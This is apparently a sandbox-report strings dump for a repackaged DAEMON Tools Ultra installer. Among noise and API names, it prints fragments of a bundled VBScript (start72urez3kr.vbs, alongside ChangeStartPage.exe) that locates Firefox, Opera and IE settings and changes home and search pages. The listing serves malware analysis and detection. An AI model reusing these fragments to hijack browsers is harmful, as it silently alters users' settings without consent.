Ansi based on Dropped File (JSSys3.dll.204366558)

Shows Open File dialogue.

Ansi based on Dropped File (JSSys3.dll.204366558)

Shows Open File dialogue.W8

Ansi based on Dropped File (JSSys3.dll.204366558)

ShowSuperHidden

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ShowTypeOverlay

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ShowWindow

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

signature = "$WINDOWS NT$"

Ansi based on Dropped File (SET4F37.tmp)

sInitDir

Ansi based on Dropped File (JSSys3.dll.204366558)

Size of PE file in KB.

Ansi based on Dropped File (JSSys3.dll.204366558)

Size of PE file in KB./

Ansi based on Dropped File (JSSys3.dll.204366558)

SKvs

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

sl7B`)4ORQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Sleep

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00407000.00000002.mdmp)

SM[;64;,353,.3++++++++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SmoothScroll

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

sMVZ{,eJ]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

sndPlaySoundA

Ansi based on Dropped File (JSSys3.dll.204366558)

SOFTWARE\14919ea49a8f3b4aa3cf1058d9a64cec

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

Software\Disc Soft\DAEMON Tools Ultra

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

SOFTWARE\Microsoft\Driver Signing

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

Software\Microsoft\Windows\CurrentVersion

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Software\Microsoft\Windows\CurrentVersion\App Paths\

Unicode based on Dropped File (JSSys3.dll.204366558)

SourcePath

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

SP9:%$W@].

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

space for _onexit/atexit table

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

space for thread data

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SpecialFoldersCacheSize

Unicode based on Runtime Data (DiscSoftBusService.exe )

sProcList

Ansi based on Dropped File (JSSys3.dll.204366558)

sptd:

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

SQMServiceList

Unicode based on Runtime Data (dtinst.exe )

ssembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel> </requestedPrivileges> </security> </trustInfo></assembly>

Ansi based on Dropped File (Tages.dll.423655889)

sStartDir

Ansi based on Dropped File (JSSys3.dll.204366558)

ST[88;83/53+.+++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

staller integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

start72urez3kr.vbs

Unicode based on Runtime Data (ChangeStartPage.exe )

Starts timer.

Ansi based on Dropped File (JSSys3.dll.204366558)

Starts timer.W6

Ansi based on Dropped File (JSSys3.dll.204366558)

StartServiceW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

StartType = 3

Ansi based on Dropped File (SET4F37.tmp)

Startup

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

State

Unicode based on Runtime Data (dtinst.exe )

stdole2.tlbWWWH

Ansi based on Dropped File (JSSys3.dll.204366558)

stoul argument out of range

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

strContent = .ReadAll()

Ansi based on Dropped File (start72urez3kr.vbs)

strcpynW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Stream

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

StreamOps

Ansi based on Dropped File (JSSys3.dll.204366558)

StreamOpsWWW

Ansi based on Dropped File (JSSys3.dll.204366558)

StreamResource

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

StreamResourceType

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

stretch

Unicode based on Dropped File (JSSys3.dll.204366558)

string too long

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

StringCacheGeneration

Unicode based on Runtime Data (dtinst.exe )

StringFileInfo

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

strPrefsPath = objFSO.BuildPath(strProfilePath, "prefs.js")

Ansi based on Dropped File (start72urez3kr.vbs)

strPrefsPath = WScript.CreateObject("Shell.Application").NameSpace("shell:AppData").Self.Path & "\Opera\Opera\operaprefs.ini"

Ansi based on Dropped File (start72urez3kr.vbs)

strProfilePath = objFSO.BuildPath(objFSO.GetParentFolderName(strProfilesFileName), objINIEdit.GetIniVal(strProfilesFileName, strSection, "Path"))

Ansi based on Dropped File (start72urez3kr.vbs)

strProfilePath = objINIEdit.GetIniVal(strProfilesFileName, strSection, "Path")

Ansi based on Dropped File (start72urez3kr.vbs)

strProfilesFileName = WScript.CreateObject("Shell.Application").NameSpace("shell:AppData").Self.Path & "\Mozilla\Firefox\profiles.ini"

Ansi based on Dropped File (start72urez3kr.vbs)

strSection = "Profile0"

Ansi based on Dropped File (start72urez3kr.vbs)

Sub ChangeFirefoxHomePage()

Ansi based on Dropped File (start72urez3kr.vbs)

Sub ChangeIEHomePage()

Ansi based on Dropped File (start72urez3kr.vbs)

Sub ChangeIESearchPage()

Ansi based on Dropped File (start72urez3kr.vbs)

Sub ChangeOperaHomePage()

Ansi based on Dropped File (start72urez3kr.vbs)

Sunday

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SuppressionPolicy

Unicode based on Runtime Data (DiscSoftBusService.exe )

SyncRealTime

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

SyncVHD

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

SysListView32

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

System.NamespaceCLSID

Unicode based on Runtime Data (ChangeStartPage.exe )

System32

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

system32

Unicode based on Runtime Data (HiRu.exe )

System\CurrentControlSet\Control\Session Manager\WPA\PnP

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

SYSTEM\CurrentControlSet\Services\

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

System\WPA\PnP

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

SystemParametersInfoA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

SystemParametersInfoW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SystemSetupInProgress

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

S|L ~Hcnk

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

t Ltd.

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T |f`Y!,!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

t%]ETE,L(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T%qywkx3<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

t*eL'c#>T

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

t-NRs0X`n

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T0B72M+tg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

t0di!R4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T44442222212

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T4X'gu Gz

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

t6HM|M[10

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T81zS[(e

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T\f\z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T_?=\{tL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

t`@N)nEw'

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Tahoma

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tArea7U

Ansi based on Dropped File (Aero.dll.125350702)

TargetIP

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

TargetName

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

TargetPort

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

TargetPortalGroupTag

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

TBXb[Qpr`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tDsgaX#xT

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Template\_GrayTemplate.xaml?

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

teProcessW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TeQZ49Wi%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TerminateProcess

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

Text Files(*.txt)

Unicode based on Dropped File (JSSys3.dll.204366558)

tg$,\4^F

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TG<9EA@/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tg\6MgSCd

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TH15J*4>q

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ThemeApiConnectionRequest

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ThreadingModel

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Thursday

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

tiatorName

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

TileWallpaper

Unicode based on Dropped File (JSSys3.dll.204366558)

time Error!Program:

Unicode based on Memory/File Scan (dtinst.exe , 00040537-00003780.00000000.41037.002D7000.00000002.mdmp)

TimerStart

Ansi based on Dropped File (JSSys3.dll.204366558)

TimerStartWW

Ansi based on Dropped File (JSSys3.dll.204366558)

TimerStop

Ansi based on Dropped File (JSSys3.dll.204366558)

TimerStopWWW

Ansi based on Dropped File (JSSys3.dll.204366558)

Title

Unicode based on Dropped File (JSSys3.dll.204366558)

TitleBar

Unicode based on Dropped File (JSSys3.dll.204366558)

TitleBar2

Unicode based on Dropped File (JSSys3.dll.204366558)

TitleBarText

Unicode based on Dropped File (JSSys3.dll.204366558)

TitleText

Unicode based on Dropped File (JSSys3.dll.204366558)

Tjv]7C,:)bv

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tleBarText

Unicode based on Dropped File (JSSys3.dll.204366558)

TlsAlloc

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

TlsFree

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

TlsGetValue

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

TlsSetValue

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

tmETKQR j;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tmfjebczzR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TMNQQOW\P^^bo

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Too_,

Ansi based on Image Processing (screen_7.png)

Tools

Ansi based on Image Processing (screen_4.png)

Tpe6yna:

Ansi based on Image Processing (screen_4.png)

tpjgbbI???Y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tpjlcbb@Jz"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Tpl5eovke

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TraceMessage

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

TraceMessageVa

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

TrackPopupMenu

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TranslateMessage

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

Translation

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TransparentEnabled

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

TS\compoOps

Ansi based on Dropped File (JSSys3.dll.204366558)

TSAppCompat

Unicode based on Runtime Data (nsCDD1.tmp )

TSUserEnabled

Unicode based on Runtime Data (nsCDD1.tmp )

tSxt4;</300+..+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Tt<2+?Y#s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tt<Gx

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tU<G_NX")

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Tuesday

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

turday

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

TVcW*>w.O

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TvnN(&J7x

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TYqf.@h>o

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

u*'Lg#|RJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

U.s*MaDyTj

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

U3;%cwx5"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

u7Dnw3J|)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

U7yJ^HW#,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

U<6 3)JS4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

u>Du:k6u9V>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

u@-6`{_/%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

U_o4cq="B

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

u_UKz}K53

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

U`D1iE@@Lq]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

UaE]3C;bjr

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Ultra v3.0.0.0309

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

UMU[68;6,44,33+,,,+3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Unable to get file info.

Unicode based on Dropped File (JSSys3.dll.204366558)

UNCAsIntranet

Unicode based on Runtime Data (DiscSoftBusService.exe )

Undefined error creating File object.

Unicode based on Dropped File (JSSys3.dll.204366558)

unexpected heap error

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

UnhandledExceptionFilter

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

Uninstall.exe

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

UninstallString

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Unknown

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

Unknown error

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

UnmapViewOfFile

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

unpacking data: %d%%

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

UnregisterTraceGuids

Ansi based on Dropped File (Tages.dll.423655889)

UnRegisterTypeLibForUser

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

UnregServer

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

UnregServerPerUser

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

unXAg$cr1

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

UO\?

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

UpdateDriverForPlugAndPlayDevicesW

Ansi based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

uQoV/\3O

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

uR!UAcXn

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

UrcHCDdp,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

US[88;;43533.++++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

usb.inf

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

USB\Vid_25B1&Pid_0001

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

usbbus

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

UsbMon

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

UseDoubleClickTimer

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

UseDropHandler

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

UseFilter

Unicode based on Runtime Data (ChangeStartPage.exe )

UseHostnameAsAlias

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

UseOldHostResolutionOrder

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

user32

Ansi based on Dropped File (JSSys3.dll.204366558)

USER32.dll

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

USER32.DLL

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

user32.dll

Ansi based on Dropped File (Tages.dll.423655889)

UserenvDebugLevel

Unicode based on Runtime Data (dtinst.exe )

Users

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

usI4/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

USt[8;;335/,..++++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

utdOqJr#/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

uUGKzB=.9@%[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

UUUU`aaaa_

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

UvZLK7U-q

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

uyzoF(v7c

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

uZVA@ccsra

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

v!!!!!!!!!!!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V%.9w3i84#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

v&&&#&##########!###!!!!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

v(e6t|(T}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V.ozGg\-c|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V5<4jb7D(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

v9SiU%p=H

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V:4aXp=QJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V:^:Y5(=kg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V?$CComPtr@UIDSAsyncResultHandler@@@ATL@@@_mfi@boost@@V?$list2@V?$value@PAVCDSDeviceManager@@@_bi@boost@@V?$value@V?$CComPtr@UIDSAsyncResultHandler@@@ATL@@@23@@_bi@3@@_bi@boost@@@detail@boost@@

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

V`*|<Jl!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

v`YH0zHMG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vap!/WCs_>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VarFileInfo

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vateProfileStringA

Ansi based on Dropped File (JSSys3.dll.204366558)

vB%%% %Bw{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VBA6.DLL

Ansi based on Dropped File (JSSys3.dll.204366558)

vBoolMin

Ansi based on Dropped File (JSSys3.dll.204366558)

VBRUN

Ansi based on Dropped File (JSSys3.dll.204366558)

VC]X;;!^>1N

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vCLSID

Ansi based on Dropped File (JSSys3.dll.204366558)

vczuzy

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Vd_)wK"t\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vData

Ansi based on Dropped File (JSSys3.dll.204366558)

vDeskHeight

Ansi based on Dropped File (JSSys3.dll.204366558)

vDeskHeightW

Ansi based on Dropped File (JSSys3.dll.204366558)

vDeskWidth

Ansi based on Dropped File (JSSys3.dll.204366558)

vDriveLetter

Ansi based on Dropped File (JSSys3.dll.204366558)

VE0hU.Z8o

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vector<T> too long

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

Vendor = "Disc Soft Ltd"

Ansi based on Dropped File (SET4F37.tmp)

verifying installer: %d%%

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VerQueryValueA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

VerQueryValueW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Version

Unicode based on Runtime Data (DiscSoftBusService.exe )

version

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

Version of software product to which PE file belongs.

Ansi based on Dropped File (JSSys3.dll.204366558)

Version of software product to which PE file belongs.W2

Ansi based on Dropped File (JSSys3.dll.204366558)

version.dll

Ansi based on Dropped File (JSSys3.dll.204366558)

VERSION.dll

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

veTitle

Unicode based on Dropped File (JSSys3.dll.204366558)

veTitleBar

Unicode based on Dropped File (JSSys3.dll.204366558)

veTitleBar2

Unicode based on Dropped File (JSSys3.dll.204366558)

vExitMode

Ansi based on Dropped File (JSSys3.dll.204366558)

vExitModeWWW

Ansi based on Dropped File (JSSys3.dll.204366558)

Vf_]q5zyI

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vFilePath

Ansi based on Dropped File (JSSys3.dll.204366558)

vFilePathWWW

Ansi based on Dropped File (JSSys3.dll.204366558)

vForce

Ansi based on Dropped File (JSSys3.dll.204366558)

vfqvC6fh<FR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

